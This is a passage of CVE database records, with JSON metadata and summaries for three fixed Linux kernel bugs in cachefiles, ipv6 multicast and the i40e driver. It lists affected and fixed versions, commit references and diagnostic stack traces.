            {
              "lessThan": "cb5466783793e66272624cf71925ae1d1ba32083",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "037d5a949b0455540ef9aab34c10ddf54b65d285",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "43eccc5823732ba6daab2511ed32dfc545a666d8",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "94965be37add0983672e48ecb33cdbda92b62579",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "8b218e2f0a27a9f09428b1847b4580640b9d1e58",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "38e921616320d159336b0ffadb09e9fb4945c7c3",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "9cac69912052a4def571fedf1cb9bb4ec590e25a",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            },
            {
              "lessThan": "e21a2f17566cbd64926fb8f16323972f7a064444",
              "status": "affected",
              "version": "9ae326a69004dea8af2dae4fde58de27db700a8d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/cache.c",
            "fs/cachefiles/daemon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.30"
            },
            {
              "lessThan": "2.6.30",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.309",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.309",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncachefiles: fix memory leak in cachefiles_add_cache()\n\nThe following memory leak was reported after unbinding /dev/cachefiles:\n\n==================================================================\nunreferenced object 0xffff9b674176e3c0 (size 192):\n  comm \"cachefilesd2\", pid 680, jiffies 4294881224\n  hex dump (first 32 bytes):\n    01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\n    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\n  backtrace (crc ea38a44b):\n    [\u003cffffffff8eb8a1a5\u003e] kmem_cache_alloc+0x2d5/0x370\n    [\u003cffffffff8e917f86\u003e] prepare_creds+0x26/0x2e0\n    [\u003cffffffffc002eeef\u003e] cachefiles_determine_cache_security+0x1f/0x120\n    [\u003cffffffffc00243ec\u003e] cachefiles_add_cache+0x13c/0x3a0\n    [\u003cffffffffc0025216\u003e] cachefiles_daemon_write+0x146/0x1c0\n    [\u003cffffffff8ebc4a3b\u003e] vfs_write+0xcb/0x520\n    [\u003cffffffff8ebc5069\u003e] ksys_write+0x69/0xf0\n    [\u003cffffffff8f6d4662\u003e] do_syscall_64+0x72/0x140\n    [\u003cffffffff8f8000aa\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0x76\n==================================================================\n\nPut the reference count of cache_cred in cachefiles_daemon_unbind() to\nfix the problem. And also put cache_cred in cachefiles_add_cache() error\nbranch to avoid memory leaks."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:57:42.799Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cb5466783793e66272624cf71925ae1d1ba32083"
        },
        {
          "url": "https://git.kernel.org/stable/c/037d5a949b0455540ef9aab34c10ddf54b65d285"
        },
        {
          "url": "https://git.kernel.org/stable/c/43eccc5823732ba6daab2511ed32dfc545a666d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/94965be37add0983672e48ecb33cdbda92b62579"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b218e2f0a27a9f09428b1847b4580640b9d1e58"
        },
        {
          "url": "https://git.kernel.org/stable/c/38e921616320d159336b0ffadb09e9fb4945c7c3"
        },
        {
          "url": "https://git.kernel.org/stable/c/9cac69912052a4def571fedf1cb9bb4ec590e25a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e21a2f17566cbd64926fb8f16323972f7a064444"
        }
      ],
      "title": "cachefiles: fix memory leak in cachefiles_add_cache()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26840",
    "datePublished": "2024-04-17T10:10:06.180Z",
    "dateReserved": "2024-02-19T14:20:24.182Z",
    "dateUpdated": "2025-05-04T08:57:42.799Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27390 (GCVE-0-2024-27390)

Vulnerability from cvelistv5 – Published: 2024-05-01 13:05 – Updated: 2025-05-04 09:03

Title

ipv6: mcast: remove one synchronize_net() barrier in ipv6_mc_down()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: mcast: remove one synchronize_net() barrier in ipv6_mc_down() As discussed in the past (commit 2d3916f31891 ("ipv6: fix skb drops in igmp6_event_query() and igmp6_event_report()")) I think the synchronize_net() call in ipv6_mc_down() is not needed. Under load, synchronize_net() can last between 200 usec and 5 ms. KASAN seems to agree as well.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9d159d6637ccce25f…
	https://git.kernel.org/stable/c/a03ede2282ebbd181…
	https://git.kernel.org/stable/c/26d4bac55750d535f…
	https://git.kernel.org/stable/c/7eb06ee5921189812…
	https://git.kernel.org/stable/c/5da9a218340a2bc80…
	https://git.kernel.org/stable/c/17ef8efc00b34918b…

Impacted products

Vendor

Product

Version

Linux

Affected: f185de28d9ae6c978135993769352e523ee8df06 , < 9d159d6637ccce25f879d662a480541ef4ba3a50 (git)
Affected: f185de28d9ae6c978135993769352e523ee8df06 , < a03ede2282ebbd181bd6f5c38cbfcb5765afcd04 (git)
Affected: f185de28d9ae6c978135993769352e523ee8df06 , < 26d4bac55750d535f1f0b8790dc26daf6089e373 (git)
Affected: f185de28d9ae6c978135993769352e523ee8df06 , < 7eb06ee5921189812e6b4bfe7b0f1e878be16df7 (git)
Affected: f185de28d9ae6c978135993769352e523ee8df06 , < 5da9a218340a2bc804dc4327e5804392e24a0b88 (git)
Affected: f185de28d9ae6c978135993769352e523ee8df06 , < 17ef8efc00b34918b966388b2af0993811895a8c (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.217Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d159d6637ccce25f879d662a480541ef4ba3a50"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a03ede2282ebbd181bd6f5c38cbfcb5765afcd04"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26d4bac55750d535f1f0b8790dc26daf6089e373"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7eb06ee5921189812e6b4bfe7b0f1e878be16df7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5da9a218340a2bc804dc4327e5804392e24a0b88"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17ef8efc00b34918b966388b2af0993811895a8c"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27390",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:43:45.909098Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:28.377Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/mcast.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9d159d6637ccce25f879d662a480541ef4ba3a50",
              "status": "affected",
              "version": "f185de28d9ae6c978135993769352e523ee8df06",
              "versionType": "git"
            },
            {
              "lessThan": "a03ede2282ebbd181bd6f5c38cbfcb5765afcd04",
              "status": "affected",
              "version": "f185de28d9ae6c978135993769352e523ee8df06",
              "versionType": "git"
            },
            {
              "lessThan": "26d4bac55750d535f1f0b8790dc26daf6089e373",
              "status": "affected",
              "version": "f185de28d9ae6c978135993769352e523ee8df06",
              "versionType": "git"
            },
            {
              "lessThan": "7eb06ee5921189812e6b4bfe7b0f1e878be16df7",
              "status": "affected",
              "version": "f185de28d9ae6c978135993769352e523ee8df06",
              "versionType": "git"
            },
            {
              "lessThan": "5da9a218340a2bc804dc4327e5804392e24a0b88",
              "status": "affected",
              "version": "f185de28d9ae6c978135993769352e523ee8df06",
              "versionType": "git"
            },
            {
              "lessThan": "17ef8efc00b34918b966388b2af0993811895a8c",
              "status": "affected",
              "version": "f185de28d9ae6c978135993769352e523ee8df06",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/mcast.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: mcast: remove one synchronize_net() barrier in ipv6_mc_down()\n\nAs discussed in the past (commit 2d3916f31891 (\"ipv6: fix skb drops\nin igmp6_event_query() and igmp6_event_report()\")) I think the\nsynchronize_net() call in ipv6_mc_down() is not needed.\n\nUnder load, synchronize_net() can last between 200 usec and 5 ms.\n\nKASAN seems to agree as well."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:03:57.158Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9d159d6637ccce25f879d662a480541ef4ba3a50"
        },
        {
          "url": "https://git.kernel.org/stable/c/a03ede2282ebbd181bd6f5c38cbfcb5765afcd04"
        },
        {
          "url": "https://git.kernel.org/stable/c/26d4bac55750d535f1f0b8790dc26daf6089e373"
        },
        {
          "url": "https://git.kernel.org/stable/c/7eb06ee5921189812e6b4bfe7b0f1e878be16df7"
        },
        {
          "url": "https://git.kernel.org/stable/c/5da9a218340a2bc804dc4327e5804392e24a0b88"
        },
        {
          "url": "https://git.kernel.org/stable/c/17ef8efc00b34918b966388b2af0993811895a8c"
        }
      ],
      "title": "ipv6: mcast: remove one synchronize_net() barrier in ipv6_mc_down()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27390",
    "datePublished": "2024-05-01T13:05:12.775Z",
    "dateReserved": "2024-02-25T13:47:42.677Z",
    "dateUpdated": "2025-05-04T09:03:57.158Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36004 (GCVE-0-2024-36004)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:48 – Updated: 2025-05-04 09:10

Title

i40e: Do not use WQ_MEM_RECLAIM flag for workqueue

Summary

In the Linux kernel, the following vulnerability has been resolved: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue Issue reported by customer during SRIOV testing, call trace: When both i40e and the i40iw driver are loaded, a warning in check_flush_dependency is being triggered. This seems to be because of the i40e driver workqueue is allocated with the WQ_MEM_RECLAIM flag, and the i40iw one is not. Similar error was encountered on ice too and it was fixed by removing the flag. Do the same for i40e too. [Feb 9 09:08] ------------[ cut here ]------------ [ +0.000004] workqueue: WQ_MEM_RECLAIM i40e:i40e_service_task [i40e] is flushing !WQ_MEM_RECLAIM infiniband:0x0 [ +0.000060] WARNING: CPU: 0 PID: 937 at kernel/workqueue.c:2966 check_flush_dependency+0x10b/0x120 [ +0.000007] Modules linked in: snd_seq_dummy snd_hrtimer snd_seq snd_timer snd_seq_device snd soundcore nls_utf8 cifs cifs_arc4 nls_ucs2_utils rdma_cm iw_cm ib_cm cifs_md4 dns_resolver netfs qrtr rfkill sunrpc vfat fat intel_rapl_msr intel_rapl_common irdma intel_uncore_frequency intel_uncore_frequency_common ice ipmi_ssif isst_if_common skx_edac nfit libnvdimm x86_pkg_temp_thermal intel_powerclamp gnss coretemp ib_uverbs rapl intel_cstate ib_core iTCO_wdt iTCO_vendor_support acpi_ipmi mei_me ipmi_si intel_uncore ioatdma i2c_i801 joydev pcspkr mei ipmi_devintf lpc_ich intel_pch_thermal i2c_smbus ipmi_msghandler acpi_power_meter acpi_pad xfs libcrc32c ast sd_mod drm_shmem_helper t10_pi drm_kms_helper sg ixgbe drm i40e ahci crct10dif_pclmul libahci crc32_pclmul igb crc32c_intel libata ghash_clmulni_intel i2c_algo_bit mdio dca wmi dm_mirror dm_region_hash dm_log dm_mod fuse [ +0.000050] CPU: 0 PID: 937 Comm: kworker/0:3 Kdump: loaded Not tainted 6.8.0-rc2-Feb-net_dev-Qiueue-00279-gbd43c5687e05 #1 [ +0.000003] Hardware name: Intel Corporation S2600BPB/S2600BPB, BIOS SE5C620.86B.02.01.0013.121520200651 12/15/2020 [ +0.000001] Workqueue: i40e i40e_service_task [i40e] [ +0.000024] RIP: 0010:check_flush_dependency+0x10b/0x120 [ +0.000003] Code: ff 49 8b 54 24 18 48 8d 8b b0 00 00 00 49 89 e8 48 81 c6 b0 00 00 00 48 c7 c7 b0 97 fa 9f c6 05 8a cc 1f 02 01 e8 35 b3 fd ff <0f> 0b e9 10 ff ff ff 80 3d 78 cc 1f 02 00 75 94 e9 46 ff ff ff 90 [ +0.000002] RSP: 0018:ffffbd294976bcf8 EFLAGS: 00010282 [ +0.000002] RAX: 0000000000000000 RBX: ffff94d4c483c000 RCX: 0000000000000027 [ +0.000001] RDX: ffff94d47f620bc8 RSI: 0000000000000001 RDI: ffff94d47f620bc0 [ +0.000001] RBP: 0000000000000000 R08: 0000000000000000 R09: 00000000ffff7fff [ +0.000001] R10: ffffbd294976bb98 R11: ffffffffa0be65e8 R12: ffff94c5451ea180 [ +0.000001] R13: ffff94c5ab5e8000 R14: ffff94c5c20b6e05 R15: ffff94c5f1330ab0 [ +0.000001] FS: 0000000000000000(0000) GS:ffff94d47f600000(0000) knlGS:0000000000000000 [ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ +0.000001] CR2: 00007f9e6f1fca70 CR3: 0000000038e20004 CR4: 00000000007706f0 [ +0.000000] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ +0.000001] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ +0.000001] PKRU: 55555554 [ +0.000001] Call Trace: [ +0.000001] <TASK> [ +0.000002] ? __warn+0x80/0x130 [ +0.000003] ? check_flush_dependency+0x10b/0x120 [ +0.000002] ? report_bug+0x195/0x1a0 [ +0.000005] ? handle_bug+0x3c/0x70 [ +0.000003] ? exc_invalid_op+0x14/0x70 [ +0.000002] ? asm_exc_invalid_op+0x16/0x20 [ +0.000006] ? check_flush_dependency+0x10b/0x120 [ +0.000002] ? check_flush_dependency+0x10b/0x120 [ +0.000002] __flush_workqueue+0x126/0x3f0 [ +0.000015] ib_cache_cleanup_one+0x1c/0xe0 [ib_core] [ +0.000056] __ib_unregister_device+0x6a/0xb0 [ib_core] [ +0.000023] ib_unregister_device_and_put+0x34/0x50 [ib_core] [ +0.000020] i40iw_close+0x4b/0x90 [irdma] [ +0.000022] i40e_notify_client_of_netdev_close+0x54/0xc0 [i40e] [ +0.000035] i40e_service_task+0x126/0x190 [i40e] [ +0.000024] process_one_work+0x174/0x340 [ +0.000003] worker_th ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/09b54d29f05129b09…
	https://git.kernel.org/stable/c/546d0fe9d76e8229a…
	https://git.kernel.org/stable/c/fbbb2404340dd6178…
	https://git.kernel.org/stable/c/ff7431f898dd00892…
	https://git.kernel.org/stable/c/152ed360cf2d273f8…
	https://git.kernel.org/stable/c/8d6105f637883c8c0…
	https://git.kernel.org/stable/c/1594dac8b1ed78f9e…
	https://git.kernel.org/stable/c/2cc7d150550cc981a…

Impacted products

Vendor

Product

Version

Linux

Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < 09b54d29f05129b092f7c793a70b689ffb3c7b2c (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < 546d0fe9d76e8229a67369f9cb61e961d99038bd (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < fbbb2404340dd6178e281bd427c271f7d5ec1d22 (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < ff7431f898dd00892a545b7d0ce7adf5b926944f (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < 152ed360cf2d273f88fc99a518b7eb868aae2939 (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < 8d6105f637883c8c09825e962308c06e977de4f0 (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < 1594dac8b1ed78f9e75c263327e198a2e5e25b0e (git)
Affected: 4d5957cbdecdbb77d24c1465caadd801c07afa4a , < 2cc7d150550cc981aceedf008f5459193282425c (git)

Linux

Affected: 4.14
Unaffected: 0 , < 4.14 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36004",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:00:59.391854Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:48.116Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.511Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09b54d29f05129b092f7c793a70b689ffb3c7b2c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/546d0fe9d76e8229a67369f9cb61e961d99038bd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fbbb2404340dd6178e281bd427c271f7d5ec1d22"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff7431f898dd00892a545b7d0ce7adf5b926944f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/152ed360cf2d273f88fc99a518b7eb868aae2939"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8d6105f637883c8c09825e962308c06e977de4f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1594dac8b1ed78f9e75c263327e198a2e5e25b0e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2cc7d150550cc981aceedf008f5459193282425c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/intel/i40e/i40e_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "09b54d29f05129b092f7c793a70b689ffb3c7b2c",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "546d0fe9d76e8229a67369f9cb61e961d99038bd",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "fbbb2404340dd6178e281bd427c271f7d5ec1d22",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "ff7431f898dd00892a545b7d0ce7adf5b926944f",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "152ed360cf2d273f88fc99a518b7eb868aae2939",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "8d6105f637883c8c09825e962308c06e977de4f0",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "1594dac8b1ed78f9e75c263327e198a2e5e25b0e",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            },
            {
              "lessThan": "2cc7d150550cc981aceedf008f5459193282425c",
              "status": "affected",
              "version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/intel/i40e/i40e_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.14"
            },
            {
              "lessThan": "4.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
